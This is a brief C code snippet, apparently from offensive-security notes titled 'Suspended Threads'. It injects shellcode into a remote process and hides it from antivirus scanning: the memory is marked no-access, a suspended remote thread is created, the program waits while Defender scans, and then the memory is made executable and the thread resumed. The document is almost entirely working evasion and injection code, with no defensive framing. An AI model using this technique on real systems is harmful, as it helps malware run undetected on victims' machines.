Suspended Threads
printf("[+] Changing memory protection, marking it as PAGE_NO_ACCESS\n");
//Mark memory as PAGE_NOACCESS (0x1)
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_NOACCESS, &protect); // out uint lpflOldProtect ?
// create suspended remote thread
//IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0x00000004, out hThread);
// CREATE_SUSPENDED = 0x00000004
printf("[+] Creating suspended remote thread\n");
hRemoteThread = myCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, CREATE_SUSPENDED, NULL);
//sleep 15 seconds while defender scans the memory
printf("[+] Sleeping for 15 seconds...\n");
//CronosSleep(15);
Sleep(15000);
// Mark memory as executable again; PAGE_EXECUTE_READWRITE (0x40)
printf("[+] Changing memory protection back, marking it as PAGE_EXECUTE_READWRITE\n");
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_EXECUTE_READWRITE, &protect);
printf("[+] Resuming remote thread\n");
myResumeThread(hRemoteThread);
Last updated